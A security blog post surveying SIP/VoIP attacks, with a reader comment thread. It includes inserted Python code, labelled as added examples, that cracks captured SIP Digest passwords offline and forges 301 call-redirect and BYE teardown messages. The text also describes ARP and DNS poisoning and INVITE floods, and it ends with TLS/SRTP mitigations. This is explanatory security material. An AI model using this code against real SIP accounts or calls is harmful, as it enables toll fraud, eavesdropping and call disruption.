February 24, 2014

A Sketch of SIP Security

The Internet is a great tool for communication. You can contact other people using e-mail, online chats, voice and video messengers. With the arrival of new cable systems and Balloon-Powered Internet, soon even the penguins of Antarctica will have access to the Internet!

But what about voice? If Internet coverage is this wide, why do we still need telephone lines? Voice can be sent over Internet channels, and SIP (Session Initiation Protocol) addresses exactly this need. SIP has a very interesting history, but first we want to highlight certain aspects of the protocol.
SIP is the most commonly used signalling protocol for Voice over Internet Protocol (VoIP) services. SIP only sets up a session; the actual data (the voice) is transferred separately. By default it carries its messages in clear text: the login and domain (realm) are readable directly, and the password is protected only by an MD5 digest that is sent in the open. Sometimes no authentication is used at all, and the peer is identified only by the combination IP:port.

Next we will examine several threats that can occur while using SIP and methods to exploit them.

Threats
Note that for several of the attacks below the intruder must be on the traffic path between the client and the server (or get there by performing an MITM attack).

Stealing account data
Since SIP carries its signalling in clear text, anyone who can tap the traffic obtains a good deal of information. Take the authentication process, for instance. The password itself is not sent; the client sends an MD5 digest computed over the username, realm, password, the server's nonce, the request method and the URI (RFC 3261 Digest authentication), even though it is strongly recommended not to use MD5 in any capacity. Because the nonce and every other input are visible on the wire, the captured exchange can be attacked offline by dictionary or brute force, for example with SIPcrack (sipdump to capture the exchange, sipcrack to crack it).


An intruder can use the obtained credentials in various schemes. He or she gets access to all the services that a Triple Play subscriber (a voice, Internet and TV bundle) uses. A higher risk is premium-rate service (PRS) fraud: the SIP account is used to call expensive destinations, and the subscriber is billed for somebody else's calls, which may be very expensive.

Details on brute-forcing a SIP password can be found here: http://www.sipsorcery.com/mainsite/Help/SIPPasswordSecurity
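As an added example (not code from the original post, nor SIPcrack's own code), the following Python shows what such an offline attack does: it takes a sniffed REGISTER that answers a Digest challenge, recomputes the MD5 response for every candidate password and stops when the result matches. The captured message is constructed here with a known weak password and the documentation addresses 192.0.2.10 / sip.example.net; the nonce, tags and Call-ID are invented for the example.

```python
import hashlib


def md5hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def digest_response(username, realm, password, method, uri, nonce,
                    qop=None, nc=None, cnonce=None):
    """Digest response as SIP uses it (RFC 3261 / RFC 2617, algorithm=MD5):
    HA1 = MD5(user:realm:password), HA2 = MD5(method:uri),
    response = MD5(HA1:nonce:HA2), or with qop=auth
    response = MD5(HA1:nonce:nc:cnonce:qop:HA2)."""
    ha1 = md5hex(f"{username}:{realm}:{password}")
    ha2 = md5hex(f"{method}:{uri}")
    if qop == "auth":
        return md5hex(f"{ha1}:{nonce}:{nc}:{cnonce}:{qop}:{ha2}")
    return md5hex(f"{ha1}:{nonce}:{ha2}")


def parse_auth_params(header_value: str) -> dict:
    """Turn 'Digest username="1001", realm="x", ...' into a dict (quotes stripped)."""
    scheme, _, params = header_value.partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest credential")
    out = {}
    for part in params.split(","):
        name, _, value = part.strip().partition("=")
        out[name.strip().lower()] = value.strip().strip('"')
    return out


def extract_credentials(sip_request: str):
    """Return (method, digest params) from a sniffed request carrying an
    Authorization or Proxy-Authorization header."""
    lines = sip_request.split("\r\n")
    method = lines[0].split(" ", 1)[0]
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() in ("authorization", "proxy-authorization"):
            return method, parse_auth_params(value.strip())
    raise ValueError("no Digest credentials in message")


def crack_digest(sip_request: str, wordlist):
    """Offline dictionary attack: recompute the response for each candidate
    password and compare it with the one the client sent. Every other input
    (username, realm, nonce, uri, method) was captured in clear text."""
    method, p = extract_credentials(sip_request)
    for candidate in wordlist:
        guess = digest_response(p["username"], p["realm"], candidate, method,
                                p["uri"], p["nonce"], p.get("qop"),
                                p.get("nc"), p.get("cnonce"))
        if guess == p["response"]:
            return candidate
    return None


# Constructed sample capture (not real traffic): a REGISTER answering a 401
# challenge. The response is computed with a known weak password, so the
# message is exactly what a real client would have put on the wire.
SAMPLE_NONCE = "5f1c2e9a3b7d"
SAMPLE_PASSWORD = "summer2014"
_resp = digest_response("1001", "sip.example.net", SAMPLE_PASSWORD,
                        "REGISTER", "sip:sip.example.net", SAMPLE_NONCE)
SAMPLE_REGISTER = "\r\n".join([
    "REGISTER sip:sip.example.net SIP/2.0",
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK1a2b3c",
    "From: <sip:1001@sip.example.net>;tag=7f3a",
    "To: <sip:1001@sip.example.net>",
    "Call-ID: 9d2c1e0f@192.0.2.10",
    "CSeq: 2 REGISTER",
    'Authorization: Digest username="1001", realm="sip.example.net", '
    f'nonce="{SAMPLE_NONCE}", uri="sip:sip.example.net", '
    f'response="{_resp}", algorithm=MD5',
    "Content-Length: 0", "", ""])

if __name__ == "__main__":
    wordlist = ["password", "123456", "1001", "summer2014", "qwerty"]
    print("recovered password:", crack_digest(SAMPLE_REGISTER, wordlist))
```

The nonce only stops replay of the captured response; it does nothing against guessing, because the attacker can compute as many candidate responses as he likes without talking to the server. The fix is the one that was available back then: carry the signalling over TLS so the exchange is never visible, and use passwords that survive a dictionary.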

Tapping
SIP itself does not carry the voice stream. For payload transmission (the audio, for instance) the Real-Time Transport Protocol (RTP) is used, and plain RTP does not encrypt its payload. So the question arises whether someone in the middle tapping our traffic can listen to the conversation as well. Well, yes, it is possible. Cain (Cain & Abel) is a popular tool that will kindly perform the MITM attack (ARP poisoning) and reassemble the captured RTP streams into audio files, so one can listen to the tapped conversation. An intruder can easily use information obtained this way to blackmail a victim.


Call tracking
If an intruder is able to sniff the packets the user sends, he or she can find out when and whom the victim called, because SIP does not encrypt its signalling (the From, To and Request-URI fields are readable). This information can later be used in social engineering attacks.

Attacks from behind NAT
If the subscriber does not have an external IP address of his or her own, an intruder who shares the same public address can make calls at the subscriber's expense. This happens when the Internet provider gives access to the network through NAT, with many other people behind it as well. It is common in business centers where many small companies sit behind the NAT of the local provider.


As the picture shows, the packet the provider receives still carries, in its SIP headers, the sender's IP address from before the NAT translation. However, that field is not verified when the connection is established (only the public address is checked), so the packet may contain an IP address other than that of the genuine subscriber.

Impersonating a provider
What about VoIP security on the provider side? SIP clients locate their provider's server through DNS, so by running an MITM attack against a DNS server or by DNS cache poisoning (the Kaminsky attack, for example), an intruder is able to impersonate the provider and route all calls through his or her own system.

Call redirection
After mounting an MITM attack, an attacker can redirect clients' calls to another number, including a non-existent one, which results in denial of service.


By capturing INVITE requests, the intruder answers each one with a 301 Moved Permanently response whose Contact header points at the new destination, and the caller's phone obediently re-sends the call there.

Disconnection
If an intruder has the Call-ID and the From/To tags of an active dialog (or can try likely combinations of these fields), he or she is able to tear down the session by sending a forged SIP BYE request (built with Scapy, for instance).
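To make the two forgeries above concrete, here is an added example in Python (not the post's own code and not a Scapy recipe): it parses a captured INVITE and the 200 OK that answered it, then builds the 301 redirect for the call-redirection attack and the BYE for the disconnection attack. The INVITE and 200 OK are constructed for the example, with documentation addresses (192.0.2.10, 198.51.100.7, 203.0.113.5) and invented tags and Call-ID; putting the messages on the wire with a spoofed source (a raw socket or Scapy) is left out.

```python
def parse_sip(msg: str):
    """Split a SIP message into (start line, [(header, value), ...], body).
    Just enough for the forgeries below; header names match case-insensitively."""
    head, _, body = msg.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        if not line:
            continue
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def get_header(headers, name):
    for n, v in headers:
        if n.lower() == name.lower():
            return v
    raise KeyError(name)


def uri_of(header_value: str) -> str:
    """Bare URI from a Contact/From/To value such as '"Alice" <sip:a@h>;tag=1'."""
    if "<" in header_value:
        return header_value[header_value.index("<") + 1:header_value.index(">")]
    return header_value.split(";")[0].strip()


def build_redirect(invite: str, new_target: str, to_tag: str = "f00d") -> str:
    """301 Moved Permanently for a captured INVITE. Via, From, Call-ID and CSeq
    are copied verbatim so the caller's phone matches it to its pending INVITE;
    a To tag is added as a real server would; Contact carries the new target."""
    start, h, _ = parse_sip(invite)
    if not start.startswith("INVITE "):
        raise ValueError("only INVITE is redirected")
    to = get_header(h, "To")
    if ";tag=" not in to:
        to += f";tag={to_tag}"
    lines = ["SIP/2.0 301 Moved Permanently"]
    lines += [f"Via: {v}" for n, v in h if n.lower() == "via"]
    lines += [f"From: {get_header(h, 'From')}",
              f"To: {to}",
              f"Call-ID: {get_header(h, 'Call-ID')}",
              f"CSeq: {get_header(h, 'CSeq')}",
              f"Contact: <{new_target}>",
              "Content-Length: 0", "", ""]
    return "\r\n".join(lines)


def build_bye(invite: str, ok_response: str, cseq=None,
              from_callee: bool = False, via_host: str = "203.0.113.5:5060") -> str:
    """Forged BYE for the dialog set up by invite + its 200 OK. The dialog is
    identified by Call-ID, the From tag (chosen by the caller in the INVITE)
    and the To tag (added by the callee in the 200 OK). Each side keeps its own
    CSeq counter, so a BYE sent as the caller needs a number above the INVITE's,
    while one sent as the callee can start at 1."""
    _, inv, _ = parse_sip(invite)
    _, ok, _ = parse_sip(ok_response)
    call_id = get_header(inv, "Call-ID")
    caller = get_header(inv, "From")   # caller's URI and tag
    callee = get_header(ok, "To")      # callee's URI and tag (from the 200 OK)
    inv_cseq = int(get_header(inv, "CSeq").split()[0])
    if from_callee:
        frm, to = callee, caller
        target = uri_of(get_header(inv, "Contact"))
        cseq = 1 if cseq is None else cseq
    else:
        frm, to = caller, callee
        target = uri_of(get_header(ok, "Contact"))
        cseq = inv_cseq + 1 if cseq is None else cseq
    return "\r\n".join([
        f"BYE {target} SIP/2.0",
        f"Via: SIP/2.0/UDP {via_host};branch=z9hG4bK{call_id[:8]}{cseq}",
        "Max-Forwards: 70",
        f"From: {frm}", f"To: {to}", f"Call-ID: {call_id}",
        f"CSeq: {cseq} BYE", "Content-Length: 0", "", ""])


# Constructed sample dialog (not real traffic): Alice (1001) calls 2002.
SAMPLE_INVITE = "\r\n".join([
    "INVITE sip:2002@sip.example.net SIP/2.0",
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds",
    "Max-Forwards: 70",
    'From: "Alice" <sip:1001@sip.example.net>;tag=1928301774',
    "To: <sip:2002@sip.example.net>",
    "Call-ID: a84b4c76e66710@192.0.2.10",
    "CSeq: 314159 INVITE",
    "Contact: <sip:1001@192.0.2.10:5060>",
    "Content-Length: 0", "", ""])
SAMPLE_OK = "\r\n".join([
    "SIP/2.0 200 OK",
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK776asdhds",
    'From: "Alice" <sip:1001@sip.example.net>;tag=1928301774',
    "To: <sip:2002@sip.example.net>;tag=a6c85cf",
    "Call-ID: a84b4c76e66710@192.0.2.10",
    "CSeq: 314159 INVITE",
    "Contact: <sip:2002@198.51.100.7:5060>",
    "Content-Length: 0", "", ""])

if __name__ == "__main__":
    print(build_redirect(SAMPLE_INVITE, "sip:9000@203.0.113.5"))
    print(build_bye(SAMPLE_INVITE, SAMPLE_OK))
```

Two practical points the functions encode: the forged 301 must reach the phone before the genuine answer does (on-path attackers simply drop the real one), and a BYE with a CSeq below the one the victim last used in that direction is rejected as out of order, which is why the caller-side BYE counts up from the INVITE's number. Both attacks fail when the signalling runs over TLS, since the attacker then sees neither the Call-ID nor the tags.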


Fake calls
SIP usually runs over UDP, which allows source address spoofing. An intruder may generate a flood of INVITE requests for calling a subscriber, which leads to denial of service of the telephone exchange and paralyzes the telephony system.


Conclusion on SIP security
Though protection methods against most of the attacks mentioned here were developed long ago (TLS for the SIP signalling and SRTP for the media, for example), both clients and VoIP providers largely ignore these precautions and SIP security options. So you need to watch your back, because your SIP provider isn't watching it for you.

Author: Ilya Safronov, Positive Research 

4 comments:

  1. Your RSS is broken. It has been for a while.

  2. Hi! Thanks for paying attention. It should be fine now.

  3. This comment has been removed by a blog administrator.

  4. This comment has been removed by a blog administrator.
